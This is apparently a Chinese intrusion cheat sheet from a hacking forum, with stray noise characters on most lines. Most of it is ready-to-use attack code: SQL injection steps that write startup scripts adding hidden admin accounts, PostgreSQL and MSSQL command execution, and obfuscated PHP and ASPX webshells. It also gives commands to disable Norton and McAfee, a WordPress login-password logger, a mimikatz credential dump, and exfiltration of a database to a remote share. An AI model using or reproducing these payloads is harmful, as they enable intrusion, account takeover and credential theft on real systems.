. l/ n/ [4 R5 mcreate table a (cmd text);) }+ J5 M, |, K+ i# Z
insert into a values ("set wshshell=createobject (""wscript.shell"") " );0 H! V9 h I# s2 U# f' f# a1 V+ O4 G
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );/ `* J% X8 m( y( y' L; V' ^* D/ w+ w
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
1 n! U6 A& e8 K0 l6 u. I2 c6 E- T4 Jselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
' K: o- M% Z- G+ j5 Idrop table a;
2 h" M% S7 j6 Q
/ ]( M' f( G! M; ]: j/ C, ~8 Z* C( v- e英文版本:6 E X$ S. e q
: J! X0 Q9 Z- l) _' v9 L+ f; e% Quse test;
0 Q9 O8 l0 v2 u; [6 z& W Tcreate table a (cmd text);
$ ?1 ^8 K. r1 `/ J: uinsert into a values ("set wshshell=createobject (""wscript.shell"") " );5 s3 K R2 ]5 ]1 p
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
( g& ]2 x, ]2 H" a8 linsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
9 V. s7 Y" i1 Lselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
, p1 v) G" W6 L# e x' {drop table a;
0 N" D _0 V) H+ a0 D) y9 {( s" |5 }' P- Q1 |
create table a (cmd BLOB);
& p7 t) n6 b2 ?+ O h& _$ t9 iinsert into a values (CONVERT(木马的16进制代码,CHAR));, b3 J- {8 ^+ u3 |" j+ S
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
0 c8 |2 Q; Y! B0 e) ?$ Mdrop table a;
) G) r3 o# `8 ]" ]1 s8 m6 R( v R' p3 b) T& G7 r
记录一下怎么处理变态诺顿1 k9 P6 S2 {- F. q+ J
查看诺顿服务的路径5 `1 g5 G; ~# a! }
sc qc ccSetMgr* ]+ f/ ~, p5 ^
然后设置权限拒绝访问。做绝一点。。/ V' n6 q5 G" x# M
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
8 h8 H1 T: Z }! Zcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"! C+ U5 ?" G( N% J0 a8 V* e
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators* d5 t% v1 e1 _
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
# B( p' v- V" K9 I
, k1 \. F3 u9 W然后再重启服务器1 Q: p/ L: ?. Z0 w% o$ [6 }3 j. I' C2 V
iisreset /reboot
3 }' K5 s; P5 B6 |+ }这样就搞定了。。不过完事后。记得恢复权限。。。。
* \+ j* v! j Ycacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F& m, F/ L# @& n Q
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F, X. }& o+ n3 `4 l
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F/ p$ P) W% x* n2 v. g4 @
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
/ s0 }. Q' V0 \# }: N; H# e: `5 z3 VSELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
1 A; x; J7 r: `" O9 e, P: d2 d I) d( W7 Y2 L) f. `5 V
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
1 r- ?2 J9 I8 @4 \( u) k1 m6 [; z: V" b; n0 s& g& L
postgresql注射的一些东西0 c/ c5 j% e. S7 M
如何获得webshell* ^ A! S [5 ?( |* Z6 l
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
% l. w) M+ G& B; g/ t Fhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); ( ]0 P( ^! z9 @% s3 \1 ~
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
% L Q! ^7 q. |如何读文件
. Y! x8 {$ {$ [" Z3 uhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);7 T5 p, N$ l' J6 C$ Z
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
" |6 K# g% z1 H- o' @http://127.0.0.1/postgresql.php?id=1;select * from myfile;! g; }# k) I) g7 O) x& Q o
! o2 Z- o9 Q7 i$ Cz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
$ O9 I( x5 o. f+ p4 L O/ E8 w# m当然,这些的postgresql的数据库版本必须大于8.X- d5 X( a7 o& P f; Z6 {5 N
创建一个system的函数:
/ G' u" h u7 `2 D \9 |: bCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT0 @/ k4 h$ Y$ n( M8 P
5 E2 D3 P4 j5 Q5 m- Y. ]创建一个输出表:
( Z% h& j4 X2 K; j$ |, Y- q6 bCREATE TABLE stdout(id serial, system_out text). e1 |7 R' W( `: ]
" ^6 }8 V* U. E执行shell,输出到输出表内:4 p0 s6 V8 ]& u8 y
SELECT system('uname -a > /tmp/test')( D: h( z5 P" U7 Q
$ d* ?# R+ Z5 o" L. N
copy 输出的内容到表里面;
' R* \3 R. i1 |COPY stdout(system_out) FROM '/tmp/test'( H$ L0 H) y B+ w: H% w3 G
{# ~; ?. A q6 I" A; [) {( z
从输出表内读取执行后的回显,判断是否执行成功3 i( F( w+ T' B' F5 b8 q
4 |- U% z) _/ u: z1 e' n) y* I
SELECT system_out FROM stdout
4 f& d3 }# L9 E5 k8 k- i) }" l$ E下面是测试例子% b& _1 N( b Q9 f9 c U9 }
' w! x5 [+ d9 Y' Y# ~' E/ }4 g
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
- B* _7 E$ r0 ~* Y
. S" h3 D0 E e+ C/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C': [/ \! J, a1 J4 ` R
STRICT -- i1 U4 F/ g& S4 }
5 t* `6 u& ~$ q0 V- B/store.php?id=1; SELECT system('uname -a > /tmp/test') --# F/ A. F1 Y7 u0 E: X6 J- W
% j& n# u" n9 F4 }2 J/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --" m- O5 t: r* _# [7 T6 Y0 `
# f" Z, V \' _* Q; |
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
9 q- G6 ]! a% t- s W& h0 r' a2 m: hnet stop sharedaccess stop the default firewall2 Q0 \: c2 |' y' f
netsh firewall show show/config default firewall; T& g8 X8 x, d
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
4 Z, O' M b+ x) }1 V* qnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall& T5 [$ [. j; _5 H4 ], }4 y' l! t
修改3389端口方法(修改后不易被扫出)6 o5 K$ T# C* ^0 t; [% T
修改服务器端的端口设置,注册表有2个地方需要修改$ G* @+ L0 d! `
2 M% X; i% p' L O7 M
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]. N) B5 ~; @! h [4 c/ A
PortNumber值,默认是3389,修改成所希望的端口,比如6000
4 S n* i5 U* l/ O5 d( C( z' c% u. t* i# q: E# f) Y
第二个地方:
2 F8 h [7 ^* m$ i[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
5 ?3 W, W" s% N" q. rPortNumber值,默认是3389,修改成所希望的端口,比如6000
" b9 k" L. V# k2 [# M3 s c) @* P% ]5 N) H5 s
现在这样就可以了。重启系统就可以了+ }3 f7 o! \0 S" y5 I
+ P9 m$ G! `5 s2 B/ v查看3389远程登录的脚本
6 _, C \% @0 H# [) r9 u保存为一个bat文件
" h |, n0 h6 l3 F; ]date /t >>D:\sec\TSlog\ts.log1 |! s8 G# _' l2 S7 L
time /t >>D:\sec\TSlog\ts.log3 |" J0 o; A8 {) s X/ \& Y
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
7 \2 h& F7 k F6 Istart Explorer5 w6 ^5 w; A' T Z6 u6 }
$ j2 @9 R" ]3 Fmstsc的参数:
( L% V& n, d# l' ]) w2 `# s+ I4 V8 D, D! R
远程桌面连接, u X- F ^0 s( x
2 u5 O& H8 G3 I' u3 M; Z
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
8 q7 j4 L4 L z# X6 n* O( E' q [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
1 L4 X# L# O Z+ a" g9 M3 h2 O9 z# {2 N2 @0 l! [; n; \4 h. N# V
<Connection File> -- 指定连接的 .rdp 文件的名称。
- U E: k( y5 J6 W- e3 P! \+ O' e
/v:<server[:port]> -- 指定要连接到的终端服务器。% x$ s4 b3 _7 Z% T
" c! k0 e8 Q, d) Y6 g; z/console -- 连接到服务器的控制台会话。
# K& J8 t: A5 b: k8 v+ q! e1 l" I; S- W% [: g% _
/f -- 以全屏模式启动客户端。! Z5 O0 X4 z* B+ R
- k" m; X- J% T8 x" E) u; _
/w:<width> -- 指定远程桌面屏幕的宽度。' ]* A9 I1 I- Z" T( R
5 f" }# k- s+ S! ?6 B/h:<height> -- 指定远程桌面屏幕的高度。+ d5 N8 Q: E- O' |: r
( K; {/ p9 h( D" V% J$ j& R5 }- @
/edit -- 打开指定的 .rdp 文件来编辑。
1 t$ s, D- b- X
/ K; v l, ?7 l( e; k9 Y/migrate -- 将客户端连接管理器创建的旧版
" c& O7 g% {+ w" K连接文件迁移到新的 .rdp 连接文件。3 r* q2 X& t+ l
6 x. Z& j, g [! P, p2 `/ `
' e) p; f5 h0 {/ k, m其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
/ P5 X* q* {) ^8 S* W' u/ s ]mstsc /console /v:124.42.126.xxx 突破终端访问限制数量5 U/ I- U4 z n3 M2 A$ x" u5 H
7 M3 u L8 Q/ }' C( L) \
命令行下开启33890 |- b# L, m: V. k% W
net user asp.net aspnet /add
/ S& J' m1 K+ d* @net localgroup Administrators asp.net /add$ S$ P$ F3 [! k/ a/ o& ~& \) |
net localgroup "Remote Desktop Users" asp.net /add
" {; S0 m9 a! |1 T- H& `0 |) r0 Battrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D0 Z3 s! x) t: ]( L
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
: C i% m2 r8 I, I7 aecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
: d4 P9 J( Y) e2 W% C1 Xecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
/ |1 i; g3 \3 `( [sc config rasman start= auto! @3 o; S! S( C' G: ~
sc config remoteaccess start= auto
0 r8 w( ^2 j n& A3 A5 r+ mnet start rasman
+ t+ ]% }9 M* Y* w1 E% {net start remoteaccess
2 ~0 J& Y) s; l( l2 E5 WMedia) o1 F; p4 W6 d$ K0 p
<form id="frmUpload" enctype="multipart/form-data"
3 Q. Q& _1 h3 Y7 ?+ m1 raction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
4 K4 A/ M8 p) ^) h% E<input type="file" name="NewFile" size="50"><br>
' \, ^$ H( ]6 O: r' o<input id="btnUpload" type="submit" value="Upload">5 r& z" v% x- S; D1 o
</form>
- f) ~% @6 E% q1 M" V5 _: ~0 h: Z; _. x, r% }$ B% `
control userpasswords2 查看用户的密码 q7 O/ E% A. [- B
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
8 j8 R1 L: n7 |; m' U' D1 M1 uSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
5 p0 d3 h# E# R% [2 h7 T6 l: L8 w8 n' ~" `/ | Z; H0 q
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:/ f( ?- f) i) ]9 X) m& `
测试1:
. M( R! _7 ~. n- N6 ?; [9 D: CSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1. c! o6 p- h& x4 A/ D6 N
- O" x; K9 y1 f. z
测试2:: F- G$ m% {! _: C! D6 w
& Z2 x j' f; n6 A& D `create table dirs(paths varchar(100),paths1 varchar(100), id int)
! t" K% C9 i8 o+ @5 W+ i
, V2 [+ D( U+ L5 q8 X/ v: ~delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--# |; B: c& d f" i) b7 r6 Y; G4 c9 g4 n
. D9 b7 g0 j8 a7 O6 c+ ]SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
% l2 p" b1 u F0 U* [4 B) N9 o关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
% f' U5 B2 O9 k: H, u* W! n" C可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;6 o) w! _3 m7 z2 v4 ?; V6 d
net stop mcafeeframework
& _3 d+ q$ |! Tnet stop mcshield& E7 h" }/ h" J: ^
net stop mcafeeengineservice& M& x W; F+ Q6 X, l. A6 U
net stop mctaskmanager
$ F& q9 Q; D2 _% S( Dhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
! i; v, N, Z7 V: B' C5 G, q+ o; ~1 z# j
VNCDump.zip (4.76 KB, 下载次数: 1) ) g3 l/ d7 U) G
密码在线破解http://tools88.com/safe/vnc.php6 d7 v8 J" p3 A: y* u
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取: C' n5 j) v8 g8 T
$ A; g/ p) z O6 g. u# hexec master..xp_cmdshell 'net user'+ ^" R; B& @' b1 e
mssql执行命令。' b9 L L3 @; I9 g- R
获取mssql的密码hash查询$ O0 Z* O# q7 u, j
select name,password from master.dbo.sysxlogins# Y! {! t( l8 X3 E
% J4 C1 o( R6 G% M" k+ Wbackup log dbName with NO_LOG;
7 }1 t, V" D! i1 [backup log dbName with TRUNCATE_ONLY;) B& `7 E, y/ k, ~
DBCC SHRINKDATABASE(dbName);
9 V# e8 I4 M% N, H" dmssql数据库压缩
% |1 U! g) d8 R' d+ w% q* X* i4 e- [+ o
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
4 F% o: u3 D: X' Y/ S% p9 w将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
5 Q9 `0 J) X0 ]$ I _/ c
5 ]+ W! ^; O" @, i/ R0 Vbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak') r9 V( s) x. _' L
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak# l9 _; L. q! Z
( Y- Y. `5 a6 n+ {! R% w0 q) u
Discuz!nt35渗透要点:8 m/ [! f5 t# W" {
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
$ v5 {& {# V3 U(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>! S( f5 f7 t0 G' k+ K
(3)保存。
; g& b, v! I3 u+ w# p, ]/ b" Q(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
9 k4 W: H8 \! o6 wd:\rar.exe a -r d:\1.rar d:\website\
; m+ H% C0 z Z7 x# Q递归压缩website
' X- Y, H" H% m- ?$ V6 N- e注意rar.exe的路径
H0 a7 |( m$ m; L" `. m. k2 B8 Q4 h8 t* a+ b+ f: h
<?php
; B6 C* I& Z+ a; P3 ^! B
/ E# F% F. n8 z3 Z6 E, F$telok = "0${@eval($_POST[xxoo])}";. z8 l1 i9 |1 Q" |7 l j4 [" a
" ~& r7 S) y8 R* o
$username = "123456";
! e8 S' _8 D) P' I9 f
- x2 p$ G4 q6 O, K; Y+ u( e, Q$userpwd = "123456";% u! K6 b: ~$ `4 M
; A- |, @8 |3 B5 ?1 I: m/ M6 @
$telhao = "123456";) s3 S, g+ V& H/ F' G
, a5 v" @" e1 Z ~% H$telinfo = "123456";
' r, [, P( Q, u* p7 u/ f0 _, d
; @- o. B) [& g/ \( ~?>7 h" c0 X/ T" b- C5 x* f& D$ {
php一句话未过滤插入一句话木马
- U. B, |1 g2 o/ L w& @# Z+ C5 x
站库分离脱裤技巧
6 ?! O6 v1 Z1 N+ }# Texec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
( }7 g1 I( |$ k# dexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
$ P* a3 E+ _) G; ^/ w ]# i0 x条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。3 @* f' I& P! p$ l1 l+ k% I7 [( d: |
这儿利用的是马儿的专家模式(自己写代码)。
+ }3 j1 A7 ]- W' n9 Z7 v% j) Aini_set('display_errors', 1);
( @% F! l3 ~) A1 R% Pset_time_limit(0);/ g6 b3 [" w; \1 y' n
error_reporting(E_ALL);
+ t/ G% J4 v( \9 ^$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
1 s9 V9 E: S5 l+ n6 r) q7 wmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
; c, F5 G# _8 R1 Q1 C1 a$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
; F5 B( R: G; H) v x" z$i = 0;# x+ o% ^) C! F1 }! l, Y* n
$tmp = '';
0 S6 F3 G' i- U5 |! ~( Fwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
) R0 Q" u- K$ C' U1 j $i = $i+1;
& K ~) F- Z3 U9 W. I, D $tmp .= implode("::", $row)."\n"; C ^* F# S' R6 U% G9 s% j
if(!($i%500)){//500条写入一个文件
" q' }' _2 b, J @ $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';" K2 P( E/ V+ _# o% l5 l, U# R
file_put_contents($filename,$tmp);
. v0 v5 W: P# L' J, f5 D1 A" b* a $tmp = '';
" Y* y4 A3 i% C2 M, _/ ~3 @ }
* J7 Q5 [) O1 T}0 P5 }( ?+ \. h$ g2 [7 f0 N( I
mysql_free_result($result);
* K. p' W5 Q; D$ n6 }; R7 Z1 q6 N! |: j( K' P2 J) i+ ]( x" U
9 [' z8 d1 t( R I' u% G: Y
; _0 f$ P& c$ M9 E//down完后delete
7 Q8 v) D8 R& T7 C4 H
) h1 j3 c% G& z6 A* j# d6 p; v( \ `2 T6 u
ini_set('display_errors', 1);
% {% ~2 f9 A/ x8 J- zerror_reporting(E_ALL);" D0 D8 R) ]1 D8 D2 B
$i = 0;
/ w5 ]# H5 D: G* q f6 wwhile($i<32) {
" A( v, W, J1 R! j. |" S# |6 @ $i = $i+1;9 l9 C: }5 U5 S$ L
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';" t" Y& y4 E2 c, `
unlink($filename);5 f- A" W( f h! m
}
! a Y2 t* T" V$ W0 Rhttprint 收集操作系统指纹
/ ~, T( Y- U0 z扫描192.168.1.100的所有端口$ W* x0 K, h; R
nmap –PN –sT –sV –p0-65535 192.168.1.100
( Y' v: e0 I' ]+ E+ X/ lhost -t ns www.owasp.org 识别的名称服务器,获取dns信息0 h4 [- h6 K/ w" T! U6 s. P
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输 M' s; f; K( L# x3 D# A, e
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
! x# F( n3 t/ c. L$ J8 F. z0 V( @; j5 z7 `: X" x: E7 i! Y
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
; C7 A5 B/ H/ @7 Q1 X5 ]& J% b& V e) v. \$ @
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
) {" X2 G" x7 s$ o/ H0 X
f8 U2 m0 S6 C1 Y) C( f4 V Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
+ |- |* N! y! v; q9 Q
; i$ }/ V1 w4 \ DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)8 r# n( M( }% t3 [
0 h1 a3 [ f' S
http://net-square.com/msnpawn/index.shtml (要求安装)
3 P( K; J1 O1 i4 ~/ }. g5 V* Z* G( ~# C/ j) s I# C3 |, e, I6 g
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
' G6 a. C9 Q7 c- F8 t5 R1 ^& P0 x" Y$ R
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找), x* ~1 y* i. y" v
set names gb2312, k2 w3 g& q5 A! W* v+ O" G1 q* z
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
# U3 `7 ]# b# y% A8 \: m* Q# G+ W* g9 O% c. \0 e
mysql 密码修改
1 N7 q! {" T- Q" ]% h; W1 q0 B7 g& s6 EUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
6 s5 o8 [/ P' e7 K7 iupdate user set password=PASSWORD('antian365.com') where user='root';
9 q$ W7 l5 F4 r9 i' qflush privileges;
' a1 q6 w2 o: o3 Z* u( j# L高级的PHP一句话木马后门- P/ c1 M: {" X
' }2 f6 m4 O* G A2 C' t7 n
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
6 o" V& g! H1 ? B- q% e1 S% H2 O! k8 l' o2 E. z
1、
( X. U1 l. j7 _% \. `7 L
_" H/ H. I' p6 m( v$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
) x% i6 W; q0 |7 i/ R+ v. E; `% t' m2 K3 H4 @2 T' A
$hh("/[discuz]/e",$_POST['h'],"Access");
3 k: c# `- K6 l" W0 X" ~5 n, _
, ]8 {% D$ E! A3 F% A& ^7 k% g; v//菜刀一句话! [. a: T$ b" T
1 j: D: b& U' ]0 m2、+ H( l0 x5 Q# A
6 W8 \; d+ O3 W& ^2 \% Q6 C9 U$filename=$_GET['xbid'];1 `/ P6 e& _ G0 J+ U2 d) E
% T9 Q9 d, C; x% }% s
include ($filename);
+ K+ o! w h5 E' p7 h5 h. z! {/ n6 w Z1 Q1 F) X1 G- \ P# P
//危险的include函数,直接编译任何文件为php格式运行
5 ?. z# X7 F- `# w/ k, O6 E) U! L
! X0 e: K& s- a% ]3 k9 y3、
8 n% R% ^0 n& ~2 T. f6 U# @% {% }" V+ X0 t; W& W
$reg="c"."o"."p"."y";4 c* }7 K {0 A" x. a3 Y
: [& X" v/ y1 `7 a/ |$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);* ]5 s o4 ~9 s" s
) p5 O$ w1 \% a1 t" S4 Z2 p
//重命名任何文件6 L8 U3 H# E% [8 |1 R
B1 C( n$ V! q- W
4、
, \! F# H0 @, I6 M$ e2 M" x6 U8 c2 C
+ c. w4 y- N Z+ ]9 S& Z$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";: \5 c8 e" C' P0 D* O/ T: P1 L
5 G' q/ d7 q) o0 ?% {
$gzid("/[discuz]/e",$_POST['h'],"Access");- \: p& Z# z! e. Z0 c+ \9 A+ o
9 Y8 I( E+ u# s//菜刀一句话; \8 ~6 D" k" t
& U5 _- W* P) \& x6 R
5、include ($uid);- u: t( r0 @4 n- ]4 d
1 {8 d+ }& b- k8 _& X5 X9 h//危险的include函数,直接编译任何文件为php格式运行,POST
! @; @/ w' `: x3 r0 {2 {# ?
' I E3 Z) c7 R, L% i& v6 l! m+ g. N$ A ]- t
//gif插一句话
( c4 b F4 ~7 B1 c- d0 `" X; v7 s* t% n
6、典型一句话) y5 ]: _( j$ s4 v
3 ]( d2 z) _% ]# u# `
程序后门代码
* b$ E8 z# c6 b& q<?php eval_r($_POST[sb])?>3 W$ m( @, R, N/ ]" w1 }
程序代码
; i/ o5 u: }% `& a! f<?php @eval_r($_POST[sb])?>
2 [# M9 n; d! ]! Q& O7 @% N//容错代码; r: ]8 B y3 }4 [$ p0 ~7 C. t* ~
程序代码" U4 a0 C) l+ X- b
<?php assert($_POST[sb]);?>
$ k- b. I% v, n2 Z1 S) k. {//使用lanker一句话客户端的专家模式执行相关的php语句
) A: h( A- j. m: w程序代码( h2 q& M ?2 t5 K
<?$_POST['sa']($_POST['sb']);?>+ V6 H5 \& u1 d% k* c7 t5 |4 c' y
程序代码* _5 b e" N. q3 i" ^
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>; c1 z3 F9 ]7 T4 H" O* o
程序代码
, O: L& K2 s- c; T3 Q<?php0 v& V' S- V" }2 J& I, H/ t
@preg_replace("/[email]/e",$_POST['h'],"error");
& V: ?/ J6 C2 n?>
, o! \% v8 W: ?1 n3 o//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入 y1 q8 D+ L: n5 h
程序代码
8 g9 U2 c9 Y$ _: K( C" \: d( }<O>h=@eval_r($_POST[c]);</O>/ d, n/ q# ?( Q$ W
程序代码7 d( y; d; D5 r* c h
<script language="php">@eval_r($_POST[sb])</script>" H' Q9 q. N8 r1 f8 [& T
//绕过<?限制的一句话2 V/ H( _/ ^5 b5 v, V/ [- L
+ ]% W) ]: T8 k. t
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip0 o& e+ e# v4 C% c$ i
详细用法:
1 v7 D* P, t2 X1 {# S1、到tools目录。psexec \\127.0.0.1 cmd$ F* u/ N8 a& T4 @/ P
2、执行mimikatz: N' |' Q k: P" A' p1 e0 z- n7 t
3、执行 privilege::debug
: m' t0 b! h4 e- h( M7 v+ v4、执行 inject::process lsass.exe sekurlsa.dll9 }: e+ o7 k4 x- v
5、执行@getLogonPasswords
/ a9 C# }* x* N H6、widget就是密码
& X$ u; c3 i B( z+ j( X# m7、exit退出,不要直接关闭否则系统会崩溃。. Y3 f( A7 p! ^# p- m# Z
d) H# r* V; d/ U# @7 z
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面* I( N n% l% e! e
' I5 W2 b( G+ O) N' c
自动查找系统高危补丁: l: {( ]0 C6 x: _
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt9 G4 \: P# [0 M- z/ C
! w1 }6 b4 y7 x6 D) F& O" G
突破安全狗的一句话aspx后门: s* \7 }8 k6 l2 A$ \
<%@ Page Language="C#" ValidateRequest="false" %>8 O; l2 _- P" ~. E
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>! a. h: K; a, T) Z. z. ?; C' ?
webshell下记录WordPress登陆密码. v% g5 h" Y6 _# c
webshell下记录Wordpress登陆密码方便进一步社工
& P, V0 g5 u8 i在文件wp-login.php中539行处添加:7 N7 R; J. s# e
// log password
4 \. \7 c0 m. M0 N2 G$log_user=$_POST['log'];
; [) \/ E [3 Z& \# `$ O$log_pwd=$_POST['pwd'];
$ k# E/ R/ b% c& F2 B0 d$log_ip=$_SERVER["REMOTE_ADDR"];
# w8 k7 ?3 {( ~' W0 N1 \0 h$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;1 c2 A0 i% S& B, G. [% A
$txt=$txt.”\r\n”;& I$ T4 L: p7 F5 m
if($log_user&&$log_pwd&&$log_ip){2 J. Q' A- t8 O& }- ^% P
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
: u* A" `+ q& Y% D}1 D6 X: s" y t( \' l
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
: G0 F( i, j7 G! \就是搜索case ‘login’0 _8 W, s: H5 x+ }5 L4 F/ K
在它下面直接插入即可,记录的密码生成在pwd.txt中,
* Z) o$ m$ Q: [! f' D其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录) @4 F4 ]8 c9 l1 a" y% t
利用II6文件解析漏洞绕过安全狗代码:
4 j3 g Q2 I6 w$ i9 x- w;antian365.asp;antian365.jpg
( z4 W" R' z: h0 n( W: U0 {' ]7 ?( [1 v; r
各种类型数据库抓HASH破解最高权限密码!
2 ]/ t' @9 e2 Q# o7 d0 f1.sql server2000
/ X! n, x' `) k. cSELECT password from master.dbo.sysxlogins where name='sa'
2 Q! E [& Y ?+ P0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
